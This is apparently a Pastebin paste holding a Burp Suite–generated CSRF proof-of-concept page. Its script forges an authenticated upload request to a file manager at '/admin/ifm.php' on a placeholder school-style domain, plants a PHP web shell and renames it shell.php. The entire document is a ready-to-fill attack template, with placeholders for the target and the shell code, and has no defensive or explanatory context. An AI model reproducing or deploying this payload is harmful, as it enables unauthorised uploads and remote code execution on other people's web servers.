Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <!-- CSRF PoC - generated by Burp Suite Professional -->
- <body>
- <script>history.pushState('', '', '/')</script>
- <script>
- function submitRequest()
- {
- var xhr = new XMLHttpRequest();
- xhr.open("POST", "http:\/\/urTarget.sch.id\/admin\/ifm.php", true);
- xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
- xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary7J7LuNS5DSwhqr0Q");
- xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,id;q=0.8");
- xhr.withCredentials = true;
- var body = "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
- "Content-Disposition: form-data; name=\"api\"\r\n" +
- "\r\n" +
- "upload\r\n" +
- "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
- "Content-Disposition: form-data; name=\"dir\"\r\n" +
- "\r\n" +
- "\r\n" +
- "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
- "Content-Disposition: form-data; name=\"file\"; filename=\"shell.txt\"\r\n" +
- "Content-Type: text/plain\r\n" +
- "\r\n" +
- "<?php $code= urCodeShell; echo $code;?>\r\n" +
- "\r\n" +
- "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
- "Content-Disposition: form-data; name=\"newfilename\"\r\n" +
- "\r\n" +
- "shell.php\r\n" +
- "------WebKitFormBoundary7J7LuNS5DSwhqr0Q--\r\n";
- var aBody = new Uint8Array(body.length);
- for (var i = 0; i < aBody.length; i++)
- aBody[i] = body.charCodeAt(i);
- xhr.send(new Blob([aBody]));
- }
- </script>
- <form action="#">
- <input type="button" value="Submit request" onclick="submitRequest();" />
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement